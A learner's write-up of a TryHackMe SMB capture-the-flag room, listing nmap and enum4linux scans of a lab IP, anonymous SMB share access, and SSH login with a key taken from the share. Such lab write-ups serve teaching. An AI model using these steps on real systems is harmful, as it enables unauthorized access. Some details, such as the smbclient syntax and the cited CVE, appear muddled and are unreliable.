- Purpose: Document my experience and share knowledge on the Cyber Defense challenges
- Scope: Learn the fundamental components of detecting and responding to threats in a corporate environment
- Environment: Kali Linux via VirtualBox
- Accounts and Access: Created a TryHackMe account and accessed the room via OpenVPN
- Objective: Access a server and capture the flag by enumerating an SMB and exploiting its vulnerabilities to exfiltrate sensitive data and gain access to the server and capture the flag
- Initial Scanning:
- Tools and Commands:
- Port Scanning:
nmap -Pn 10.10.242.131
- SMB Enumeration:
enum4linux -U 10.10.242.131
enum4linux -a 10.10.242.131
- Port Scanning:
- Findings:
- Users are: administrator, guest, krbtgt, domain admins, root, bin, none
- No password
- Workgroup name is WORKGROUP
- Name of machine is polosmb
- OS running on version 6.1
- Ports that are open:
- 22/tcp open ssh
- 139/tcp open netbios-ssn
- 445/tcp open microsoft-ds
- Users profiles is shared in the SMB with the sharename 'profiles'
- Tools and Commands:
-
Vulnerability Identification: CVE-2017-7494
- Techniques Used: exploiting anonymous SMB share access- a common misconfiguration that can allow us to gain information that will lead to a shell.
-
Exploitation Process:
-
Enter to access SMB
smbclient //10.10.242.131/ Anonymous -U profiles
-
Press enter on the password because there is no password set
-
Type
get Working From Home Information
to download to your download folder -
Enter
cat Working From Home Information.txt
in the terminal to view the text file -
Type
ssh [email protected] -i id_rsa
to access the server
-
- Challenges Faced: Difficulty comprehending instructions and which commands to use
- Learnings: Importance of thorough enumeration.
- Improvements: Try alternative enumeration techniques earlier.
- Summary: Successfully gained root access and captured the flag